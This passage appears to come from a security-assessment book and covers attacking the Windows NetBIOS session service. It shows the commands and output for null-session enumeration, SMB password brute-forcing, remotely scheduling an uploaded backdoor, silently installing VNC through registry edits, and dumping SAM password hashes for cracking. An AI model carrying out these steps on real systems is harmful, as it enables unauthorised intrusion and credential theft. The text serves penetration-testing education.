9.5 The NetBIOS Session Service
The NetBIOS session service is accessible through TCP port 139. In particular, the service facilitates authentication across a Windows workgroup or domain, and provides access to resources (such as files and printers). You can perform the following attacks against the NetBIOS session service:
After authenticating with the NetBIOS session service as a privileged user, you can:
9.5.1 Enumerating System Details
Various tools can enumerate sensitive information from a target Windows host with TCP port 139 open. Information can be collected either anonymously by initiating what is known as a null session, or through knowledge of a valid username and password. A null session is when you authenticate with the IPC$ share of the target host in the following manner:
net use \\target\IPC$ "" /user: ""
By specifying a null username and password, you gain anonymous access to IPC$. By default, Windows NT family hosts allow anonymous access to system and network information through NetBIOS, so the following can be gleaned:
Here are three Win32 command-line tools that are commonly used to enumerate this information:
Jordan Ritter's enum utility is a Windows command-line tool that can extensively query the NetBIOS session service. The tool can list usernames, password policy, shares, and details of other hosts including domain controllers. Example 9-14 shows the enum usage information.
Example 9-14. Enum usage and command-line options
D:\enum> enum usage: enum [switches] [hostname|ip] -U: get userlist -M: get machine list -N: get namelist dump (different from -U|-M) -S: get sharelist -P: get password policy information -G: get group and member list -L: get LSA policy information -D: dictionary crack, needs -u and -f -d: be detailed, applies to -U and -S -c: don't cancel sessions -u: specify username to use (default "") -p: specify password to use (default "") -f: specify dictfile to use (wants -D)
By default, the tool attempts to use an anonymous null session to enumerate system information. You can, however, specify a username and password from the command line or even use the -D flag along with -u and -f <filename> options to perform brute-force grinding of a valid user password against the NetBIOS session service.
Any combination of the query flags can be used within a single command. Example 9-15 shows enum being used to enumerate user, group details, and password policy information.
Example 9-15. Using enum to find system details
D:\enum> enum -UGP 192.168.189.1 server: 192.168.189.1 setting up session... success. password policy: min length: none min age: none max age: 42 days lockout threshold: none lockout duration: 30 mins lockout reset: 30 mins getting user list (pass 1, index 0)... success, got 5. __vmware_user_ _ Administrator Guest Mickey VUSR_OSG-SERV Group: Administrators OSG-SERV\Administrator Group: Backup Operators Group: Guests OSG-SERV\Guest Group: Power Users OSG-SERV\Mickey Group: Replicator Group: Users NT AUTHORITY\INTERACTIVE NT AUTHORITY\Authenticated Users Group: __vmware_ _ OSG-SERV\__vmware_user_ _ cleaning up... success.
These details show that the out-of-box default Windows 2000 password policy is in place (no minimum password length or account lockout threshold). Along with the standard Administrator, Guest, and other system accounts, the user Mickey is also present.
The winfo utility gives a good overview of the target Windows host through a null session. It collects information enum doesn't, including domain trust details and currently logged-in users. Example 9-16 demonstrates winfo in use.
Example 9-16. Using winfo to enumerate system information
D:\> winfo 192.168.189.1 Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom - http://www.ntsecurity.nu/toolbox/winfo/ SYSTEM INFORMATION: - OS version: 5.0 DOMAIN INFORMATION: - Primary domain (legacy): OSG-WHQ - Account domain: OSG-SERV - Primary domain: OSG-WHQ - DNS name for primary domain: - Forest DNS name for primary domain: PASSWORD POLICY: - Time between end of logon time and forced logoff: No forced logoff - Maximum password age: 42 days - Minimum password age: 0 days - Password history length: 0 passwords - Minimum password length: 0 characters LOCOUT POLICY: - Lockout duration: 30 minutes - Reset lockout counter after 30 minutes - Lockout threshold: 0 SESSIONS: - Computer: OSG-SERV - User: ADMINISTRATOR LOGGED IN USERS: * __vmware_user_ _ * Administrator USER ACCOUNTS: * Administrator (This account is the built-in administrator account) * Guest (This account is the built-in guest account) * mickey * VUSR_OSG-SERV * __vmware_user_ _ WORKSTATION TRUST ACCOUNTS: INTERDOMAIN TRUST ACCOUNTS: SERVER TRUST ACCOUNTS: SHARES: * IPC$ - Type: Unknown - Remark: Remote IPC * D$ - Type: Special share reserved for IPC or administrative share - Remark: Default share * ADMIN$ - Type: Special share reserved for IPC or administrative share - Remark: Remote Admin * C$ - Type: Special share reserved for IPC or administrative share - Remark: Default share
By default, Windows NT family systems share all drive letters in use, such as C$ and D$ in the examples here. These shares can be accessed as filesystems, allowing you to upload and download data. The other shares shown here (IPC$ and ADMIN$) are for administrative purposes, such as installing software and managing processes running on the host remotely.
GetAcct is a useful tool that allows you to reverse-lookup Windows NT account RID values to get user account names (also known as RID cycling). Standard enumeration tools, such as enum and winfo, simply use forward-lookup techniques to dump the user list, which administrators can protect against by setting RestrictAnonymous=1 within the system registry (discussed in the later Section 9.8).
Windows NT 4.0 hosts can only set RestrictAnonymous=1, whereas Windows 2000 hosts have extended anonymous access protection which can be set with RestrictAnonymous=2. The GetAcct utility reverse look up account ID values against Windows NT 4.0 hosts and Windows 2000 hosts that haven't set RestrictAnonymous=2. Figure 9-3 shows GetAcct in action against a Windows 2000 host at 192.168.189.1.
Figure 9-3. GetAcct performs RID cycling to enumerate users
9.5.2 Brute-Forcing User Passwords
The SMBCrack and SMB-AT tools can brute-force user passwords through the NetBIOS session service; they are available respectively from the following sites:
Table 9-5 shows a short list of common Windows NT family login and password combinations. Backup and management software including ARCserve and Tivoli require dedicated user accounts on the server or local machine to function, often set with weak passwords.
9.5.3 Authenticating with NetBIOS
Upon cracking a valid user account password, you can authenticate with NetBIOS by using the net command from a Windows platform, or a tool such as smbclient in Unix-like environments with Samba (http://www.samba.org) installed. The net command usage is as follows:
net use \\target\IPC$ password /user:username
You can also use the net utility to authenticate with ADMIN$ or administrative drive shares (C$, D$, etc.). After successfully authenticating, you can try to execute commands server-side, upload and download files, and modify registry keys.
9.5.4 Executing Commands
You can execute local commands through NetBIOS using the Windows NT at command after authenticating with the session service. The at command schedules programs to run at a designated time through the Task Scheduler service. Example 9-17 shows how I authenticate against 192.168.0.100 (with the username Administrator and password secret), then schedule c:\temp\bo2k.exe (a known backdoor that I have uploaded) to run at 10:30.
Example 9-17. Authenticating with NetBIOS and scheduling commands
C:\> net use \\192.168.0.100\ADMIN$ secret /user:administrator The command completed successfully. C:\> at \\192.168.0.100 10:30 c:\temp\bo2k.exe Added a new job with job ID = 1
I can review pending jobs on 192.168.0.100 in the following way:
C:\> at \\192.168.0.100 Status ID Day Time Command Line -------------------------------------------------------------------- 1 Today 10:30 AM c:\temp\bo2k.exe
9.5.5 Accessing and Modifying Registry Keys
You can use three tools from the Microsoft Windows NT Resource Kit to access and manipulate system registry keys on a given host:
After authenticating with the NetBIOS session service, the regdmp utility can dump the contents of the registry. regdmp has the following usage:
REGDMP [-m \\machinename | -h hivefile hiveroot | -w Win95 Directory] [-i n] [-o outputWidth] [-s] [-o outputWidth] registryPath
Example 9-18 shows regdmp in use against 192.168.189.1 to dump the contents of the entire system registry.
Example 9-18. Using regdmp to enumerate the system registry
C:\> regdmp -m \\192.168.189.1 \Registry Machine [17 1 8] HARDWARE [17 1 8] ACPI [17 1 8] DSDT [17 1 8] GBT__ _ [17 1 8] AWRDACPI [17 1 8] 00001000 [17 1 8] 00000000 = REG_BINARY 0x00003bb3 0x54445344 \ 0x00003bb3 0x42470101 0x20202054 \ 0x44525741 0x49504341 0x00001000 \ 0x5446534d 0x0100000c 0x5f5c1910 \ 0x5b5f5250 0x2e5c1183 0x5f52505f \ 0x30555043 0x00401000 0x5c080600 \ 0x5f30535f 0x0a040a12 0x0a000a00 \ 0x08000a00 0x31535f5c 0x040a125f \
You can add or modify registry keys using the regini command along with crafted text files containing the new keys and values. To silently install a VNC server on a target host, you first have to set two registry keys to define which port the service listens on and the VNC password for authentication purposes. A text file (winvnc.ini in this case) is assembled first:
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3 SocketConnect = REG_DWORD 0X00000001 Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e
After listing the keys you wish to add to the registry, use the regini command to insert them:
C:\> regini -m \\192.168.189.1 winvnc.ini
Removing registry keys from the remote system is easily achieved using the reg command (found within Windows NT family systems) with the correct delete option. To remove the VNC keys just set, use the following command:
C:\> reg delete \\192.168.189.1\HKU\.DEFAULT\Software\ORL\WinVNC3
9.5.6 Accessing The SAM Database
Through compromising the password of a user in the Administrators group, the Security Accounts Manager (SAM) encrypted password hashes can be dumped directly from memory of the remote host, thus bypassing SYSKEY encryption protecting the hashes stored within the SAM database file. A Win32 utility known as pwdump3 can achieve this by authenticating first with the ADMIN$ share and then extracting the encrypted user password hashes. pwdump3 is available from http://packetstormsecurity.org/Crackers/NT/pwdump3.zip.
Example 9-19 shows pwdump3 dumping the encrypted user password hashes from the Windows 2000 host at 192.168.189.1 to hashes.txt using the Administrator account (although any user account in the Administrators group can be used).
Example 9-19. Using pwdump3 to remotely extract password hashes
D:\pwdump> pwdump3 192.168.189.1 hashes.txt Administrator pwdump3 by Phil Staubs, e-business technology Copyright 2001 e-business technology, Inc. This program is free software based on pwpump2 by Tony Sabin under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see the COPYING file included with this program (also available at www.ebiz-tech.com/pwdump3) and the GNU GPL for further details. Please enter the password >secret Completed.
Any security assessment book covering Windows password security must cover @Stake's LC4 password cracking utility. An evaluation copy of LC4 is available from http://www.atstake.com/research/lc/, along with full commercial licensing details. LC4 can import and crack encrypted password hashes gleaned through pwdump3. A free alternative to LC4 is John the Ripper, which can crack NTLM, along with many other hashes (MD5, Blowfish, DES, etc.); it's available from http://www.openwall.com/john/.